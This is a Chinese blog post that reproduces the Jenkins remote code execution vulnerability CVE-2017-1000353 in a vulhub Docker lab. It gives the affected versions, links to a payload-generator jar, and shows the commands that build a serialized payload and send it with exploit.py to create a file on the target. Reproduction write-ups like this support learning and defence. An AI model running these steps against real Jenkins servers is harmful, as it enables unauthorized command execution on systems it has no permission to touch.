Jenkins CVE-2017-1000353远程代码执行漏洞复现

该博客详细介绍了Jenkins的一个严重漏洞CVE-2017-1000353,该漏洞允许攻击者通过构造恶意参数实现远程代码执行。影响范围包括所有Jenkins主版本和LTS版本。作者提供了漏洞复现的步骤,包括环境准备、漏洞利用方法,并给出了payload生成工具和exploit.py脚本的使用。实验结果显示,攻击者能够成功在靶机上创建文件,表明漏洞利用成功。
摘要由CSDN通过智能技术生成

Jenkins CVE-2017-1000353远程代码执行漏洞复现

(vulhub靶场无法反弹shell,实战有待测试)

影响范围

所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)

漏洞成因

该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令。

漏洞利用

环境准备
名称IP
攻击机192.168.159.174
靶机192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/jenkins/Jenkins/CVE-2017-1000353
docker-compose up -d

image-20220909152348685

漏洞复现

首先准备好生成payload的工具:CVE-2017-1000353-1.1-SNAPSHOT-all.jar

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

https://github.com/vulhub/CVE-2017-1000353

准备好上述工具后将CVE-2017-1000353-1.1-SNAPSHOT-all.jar放入CVE-2017-1000353-master文件夹下,在该文件夹下打开终端:

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python exploit.py http://192.168.159.129:8080 jenkins_poc.ser

然后回到我们的靶机中打开终端输入:

#909ba1b71d9b为我们启动的靶场id
docker ps -a
docker exec -it 909ba1b71d9b /bin/bash
ls tmp

可以看到如下图,文件创建成功,此漏洞利用成功

image-20220909152247721

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值